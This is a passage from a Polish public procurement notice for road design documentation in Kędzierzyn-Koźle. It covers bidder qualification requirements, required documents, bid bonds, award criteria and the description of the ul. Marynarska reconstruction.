- co najmniej dwóch dokumentacji projektowych budowy/przebudowy/rozbudowy drogi o długości min. 500 mb realizowanej w trybie ustawy z dnia 10 kwietnia 2003r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych 

DLA CZĘŚCI III ZAMÓWIENIA:
- co najmniej dwóch dokumentacji projektowych budowy/przebudowy/rozbudowy drogi o długości min. 180 mb realizowanej w trybie ustawy z dnia 10 kwietnia 2003r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych 

Ilekroć powyżej mowa jest o uprawnieniach, to w przypadku osób będących obywatelami krajów członkowskich Unii Europejskich oznacza to decyzję w sprawie uznania wymaganych kwalifikacji do wykonywania w Rzeczypospolitej Polskiej samodzielnych funkcji technicznych w budownictwie w zakresie przedmiotu niniejszego zamówienia  zgodnie z właściwymi przepisami, w szczególności: z ustawą o zasadach uznania kwalifikacji zawodowych nabytych w krajach członkowskich Unii Europejskiej z dnia 22 grudnia 2015r. (Dz. U. z 2016, poz. 65) oraz Ustawą z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa (tekst jednolity Dz. U. z 2014 roku, poz. 1946 z późn. zm.).
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                Obowiązek wskazania w ofercie imienia i nazwiska dotyczy Projektanta branży drogowej z uwagi na fakt, iż doświadczenie wskazanej osoby stanowi kryterium oceny ofert</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Zamawiający przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy Pzp do złożenia w szczególności następujących dokumentów:W zakresie warunków udziału w postępowaniu:
1)wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami zakresie niezbędnym do wykazania spełnienia warunku udziału w postępowaniu (wzór stanowi załącznik nr 7 do IDW).<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Formularz oferty wypełniony ściśle wg załączonego do IDW wzoru formularza ofertowego podpisany przez upełnomocnionego przedstawiciela wykonawcy (załącznik nr 1 do IDW). 2. Pełnomocnictwo Wykonawców wspólnie ubiegających się o udzielenie zamówienia, lub inne pełnomocnictwa jeżeli zasady reprezentacji nie wynikają jednoznacznie z dokumentu rejestracyjnego (ewidencyjnego). 3. (OPCJONALNIE) POLEGANIE NA ZASOBACH PODMIOTU TRZECIEGO: 3.1. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych. 3.2. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. 3.3. Jeżeli Wykonawca polega na zdolnościach lub sytuacji innych podmiotów wraz z ofertą przedłoży w szczególności przedstawiając w tym celu: - pisemne (oryginał) zobowiązanie-oświadczenie innych podmiotów do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia, (wzór stanowi załącznik nr 4 do IDW) lub inny dokument, z którego takie zobowiązanie wynika np. umowa itp. 3.4. Zobowiązanie, o którym mowa powyżej, musi być podpisane przez osobę/osoby uprawnioną/e do reprezentowania podmiotu użyczającego zasoby. Zamawiający informuje, że będzie weryfikował zasady reprezentacji podmiotu trzeciego. Zamawiający zaleca, aby do oferty załączyć dokument, z którego takie upoważnienie będzie wynikało (np. dokument rejestrowy). 3.5. Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w oświadczeniu, o których mowa w pkt 8.1.1 IDW. 3.6. Zamawiający w celu oceny, czy wykonawca polegając na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy Pzp, będzie dysponował niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia publicznego oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda aby z przedłożonego zobowiązania lub innych dokumentów wynikał: 1) zakres dostępnych Wykonawcy zasobów innego podmiotu, 2) sposób wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia publicznego, 3) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego 4) czy podmiot, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą. 3.7. Zamawiający ocenia, czy udostępniane Wykonawcy przez inne podmioty zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu oraz bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24 ust. 1 pkt 13-22 ustawy Pzp. 3.8. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują usługi, do realizacji których te zdolności są wymagane. 4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia. 1) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (w tym także wspólnicy spółki cywilnej) ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia Umowy. Umocowanie musi wynikać z treści pełnomocnictwa przedłożonego wraz z ofertą. 2) Pełnomocnictwo powinno jednoznacznie określać postępowanie, do którego się odnosi i precyzować zakres umocowania, musi też wyliczać wszystkich wykonawców, którzy wspólnie ubiegają się o zamówienie. Każdy z tych Wykonawców musi podpisać się na dokumencie pełnomocnictwa. Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 3) Każdy z Wykonawców wspólnie ubiegających się udzielenie zamówienia musi wykazać, że nie podlega wykluczeniu z postępowania, dlatego dokumenty i oświadczenia składane na potwierdzenie braku podstaw do wykluczenia składają samodzielnie wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia. 4) Oświadczenia stanowiące wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnienie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnienie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia. 5) Spełnienie warunków udziału w postępowaniu oceniane będzie łącznie. 6)Oświadczenie o przynależności albo braku przynależności do tej samej grupy kapitałowej powinno zostać przedstawione przez każdego członka Konsorcjum. 5. Jeżeli okaże się to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie zamówienia, Zamawiający może na każdym etapie postępowania wezwać wykonawców do złożenia wszystkich lub niektórych oświadczeń lub dokumentów potwierdzających, że nie podlegają wykluczeniu, spełniają warunki udziału w postępowaniu lub kryteria selekcji, a jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio oświadczenia lub dokumenty nie są już aktualne, do złożenia aktualnych oświadczeń lub dokumentów. 6. WYMAGANIA FORMALNE W STOSUNKU DO DOKUMENTÓW: 1) Oświadczenia, dotyczące wykonawcy i innych podmiotów, na których zdolnościach lub sytuacji polega wykonawca na zasadach określonych w art. 22a ustawy Pzp oraz dotyczące podwykonawców, składane są w oryginale. 2) Dokumenty inne niż oświadczenia, o których mowa w pkt 8.13.1, składane są w oryginale lub kopii poświadczonej za zgodność z oryginałem. 3) Poświadczenia za zgodność z oryginałem dokonuje odpowiednio wykonawca, podmiot, na którego zdolnościach lub sytuacji polega wykonawca, wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego albo podwykonawca, w zakresie dokumentów, które każdego z nich dotyczą. 4) Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. 5) W przypadku wskazania przez Wykonawcę dostępności oświadczeń lub dokumentów, w formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający pobierze samodzielnie z tych baz danych wskazane przez Wykonawcę oświadczenia lub dokumenty. 6) Zamawiający będzie wymagał od Wykonawcy przedstawienia tłumaczenia na język polski wskazanych przez Wykonawcę i pobranych samodzielnie przez Zamawiającego dokumentów. 7) Brak jakiegokolwiek z wymaganych dokumentów lub złożenie dokumentu niewłaściwie poświadczonego (np. nie poświadczenie klauzulą za zgodność z oryginałem odpisu lub kopii) spowoduje wezwanie przez zamawiającego do uzupełnienia dokumentów. Brak uzupełnienia dokumentów przez Wykonawcę w wyznaczonym terminie skutkował będzie wykluczeniem Wykonawcy z postępowania o udzielenie zamówienia lub odrzuceniem oferty, a także utratą wadium (jeżeli wymagane) w przypadku okoliczności o których mowa z art. 46 ust. 4a ustawy Pzp. 8) Pełnomocnictwo należy złożyć w formie oryginału lub poświadczonej notarialnie za zgodność z oryginałem kopii wystawionej przez osoby do tego upoważnione. 9) Uzupełnieniu zgodnie z przepisem art. 26 ust. 3 ustawy Pzp podlegają dokumenty o których mowa we wskazanym przepisie. W tej sytuacji nie podlegają uzupełnieniu inne wymagane w IDW dokumenty takie jak np.: formularz oferty, dowód wniesienia wadium (jeżeli wymagane) itp. 10) Wszelkie inne doku              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.Oferta musi być zabezpieczona wadium w wysokości: DLA CZĘŚCI I ZAMÓWIENIA:  1.500.00 PLN (słownie: jeden tysiąc pięćset złotych 00/100 PLN).DLA CZĘŚCI II ZAMÓWIENIA:  1.000.00 PLN (słownie: jeden tysiąc złotych 00/100 PLN).DLA CZĘŚCI III ZAMÓWIENIA:  1.000.00 PLN (słownie: jeden tysiąc złotych 00/100 PLN).2. Wadium należy wnieść przed upływem terminu składania ofert. 3. Wadium może być wnoszone w jednej lub kilku następujących formach: 1) pieniądzu: przelewem na rachunek bankowy Zamawiającego: PKO BP Kędzierzyn-Koźle 57 1020 3714 0000 4102 0108 5455; 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 3) gwarancjach bankowych; 4) gwarancjach ubezpieczeniowych; 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014 r. poz. 1804 oraz z 2015 r. poz. 978 i 1240). 4. W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczenia, dokument taki musi być nieodwołalny, bezwarunkowy i płatny na pierwsze pisemne żądanie Zamawiającego, sporządzony zgodnie z obowiązującym prawem i winien zawierać następujące elementy: 1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), nazwę gwaranta/poręczyciela (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedziby, 2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem, 3) kwotę gwarancji/poręczenia, 4) termin ważności gwarancji/poręczenia, 5) zobowiązanie gwaranta/poręczyciela że Zamawiającemu służy prawo wypłaty wadium ze strony Gwaranta, w przypadkach określonych w art. 46 ust. 4a i 5. 5. Wadium wniesione w formie wymienionej w pkt 10.3 ppkt 2-5 należy obowiązkowo ZAŁĄCZYĆ w ORYGINALE do oferty. Brak oryginału dokumentu przy ofercie traktowane będzie jako niezabezpieczenie oferty wadium. 6. Zamawiający zwraca wadium niezwłocznie wraz z odsetkami zgodnie z zasadami wynikającymi z art. 46 ustawy Pzp. 7. Zamawiający zatrzymuje wadium wraz z odsetkami zgodnie z art. 46, ust. 4a i 5 ustawy Pzp. 8. Wykonawca zobowiązany jest do ponownego wniesienia wadium na zasadach określonych w art. 46 ust. 3 ustawy Pzp.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena całkowita brutto </td><td>60</td></tr><tr><td>Termin wykonania zamówienia</td><td>20</td></tr><tr><td>Doświadczenie projektanta branży drogowej</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający przewiduje możliwość zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy. Podstawa zakres, charakter i warunki wprowadzania zmian zostały wskazane w istotnych postanowieniach umowy część II SIWZ Istotne postanowienia umowy.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 18/04/2017, godzina: 12:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              j.polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I
                  
                <b>Nazwa: </b> Dokumentacja projektowo-kosztorysowa przebudowy  ul. Marynarskiej w Kędzierzynie-Koźlu <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>CZĘŚĆ  I  - Dokumentacja projektowo-kosztorysowa przebudowy  ul. Marynarskiej w Kędzierzynie-Koźlu 
  Wspólny słownik zamówień (CPV): 71.32.20.00-1
1.Celem niniejszego zamówienia jest wyłonienie Wykonawcy na świadczenie usług dla potrzeb przebudowy i rozbudowy pasa drogowego ul. Marynarskiej w Kędzierzynie-Koźlu, a obejmujących w szczególności:
1)wykonanie opracowań przedprojektowych:
a)opracowań geodezyjnych,
b)dokumentacji geotechnicznej;
2)opracowanie wariantowej koncepcji programowej drogi i jej pozytywne uzgodnienie z Zamawiającym, zarządcą drogi, Radą Osiedla Kłodnica;
3)przygotowanie niezbędnych materiałów do wydania decyzji o zezwoleniu na realizację inwestycji drogowej (zwaną dalej ZRID) w trybie ustawy z dnia 10 kwietnia 2003r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych, w tym opracowanie:
a)wielobranżowego projektu budowlanego wraz z informacją dotyczącą bezpieczeństwa i ochrony zdrowia i zbiorem wszystkich wymaganych przepisami prawa warunków, uzgodnień, opinii czy decyzji (zwanym dalej dokumentami formalno-prawnymi),
b)projektu stałej organizacji ruchu,
c)pozostałych materiałów wymaganych do wniosku o wydanie ZRID,
d)kompletnej dokumentacji geodezyjno-prawnej związanej z nabyciem nieruchomości położonych w liniach   rozgraniczających nowego pasa i czasowym korzystaniem z nieruchomości w związku z prowadzeniem robót na ich terenie,
e)dokumentacji do odszkodowań oraz uzyskanie w imieniu i na rzecz Zamawiającego przedmiotowej decyzji;
4)przygotowanie dokumentacji do zgłoszenia robót niewymagających pozwolenia na budowę lub dla obiektów do rozbiórki poza liniami rozgraniczającymi drogę (w razie konieczności),
5)dostarczenie Zamawiającemu kompletnej dokumentacji do przeprowadzenia procedury przetargowej na wykonanie robót, w tym:
a)projekty wykonawcze poszczególnych branż,
b)specyfikacje techniczne wykonania i odbioru robót budowlanych dla ww. branż,
c)przedmiary robót dla ww. branż,
d)kosztorys inwestorski wraz z zestawieniem kosztów inwestycji;
6)stabilizacja granic pasa drogowego oraz przekazanie szkicu geodezyjnego po jej przeprowadzeniu.
2.Inwestycja, do której odnosi się niniejsze zamówienie zlokalizowana jest w Kędzierzynie-Koźlu przy 
ul. Marynarskiej w obrębie Kłodnica na działkach oznaczonych numerem 1052/4, 1076, 1055/4, 1055/3, 1072, 1071, 1070, 1069/1, 1065. Nie wyklucza się dodatkowych działek związanych z rozbudową ulicy, powiązaniem z istniejącymi dojazdami, ciągami pieszymi, dojściami do posesji (klatek schodowych), przebudową uzbrojenia.
3.Działka nr 1052/4 o powierzchni 1,0654 ha jest pasem drogowym ul. Marynarskiej i stanowi własność Gminy Kędzierzyn-Koźle (OP1K/00069879/4). Działki o nr 1065 i 1072 stanowią własność Gminy Kędzierzyn-Koźle (użytek B), pozostałe ww. działki stanowią własność prywatną. 
4.Informujemy, że Gmina Kędzierzyn Koźle ma uchwalony miejscowy plan zagospodarowania przestrzennego miasta (oznaczony dalej skrótem m.p.z.p.), zatwierdzony Uchwałą Rady Miasta Kędzierzyn-Koźle Nr IX/98/2003 z dnia 22.05.2003 r. (Dziennik Urzędowy Województwa Opolskiego Nr 50, poz. 1038 z dnia 01.07.2003 r.), co oznacza, że ustalenie przeznaczenia terenu, rozmieszczenie inwestycji celu publicznego oraz określenie sposobów zagospodarowania i warunków zabudowy terenu następuje właśnie w m.p.z.p.
5.Zgodnie z zapisami m.p.z.p. teren inwestycji położony jest:
1)na terenie funkcjonalnym określonym jako teren usługowo-wytwórczy  Centrum Logistyczne UW-1, tereny zabudowy mieszkaniowej wielorodzinnej i usług nieuciążliwych MWU, w ramach jednostki planistycznej D-Kłodnica;
2)w granicy strefy B ochrony konserwatorskiej;
3)w granicy obszaru potencjalnego zagrożenia powodziowego o umiarkowanym zagrożeniu powodzią;
4)w granicy strefy ochrony istniejących i projektowanych wałów przeciwpowodziowych.
6.Ul. Marynarska podlegająca przebudowie i rozbudowie jest drogą bez przejazdu rozpoczynającą swój przebieg od skrzyżowania ulic Pocztowej i Chełmońskiego, na podstawie zapisów wytycznych zarządcy drogi powinna się kończyć placem manewrowym o pow. 400m2 i ukształtowanym w sposób umożliwiający właściwe manewrowanie pojazdami technicznymi i ratownictwa.
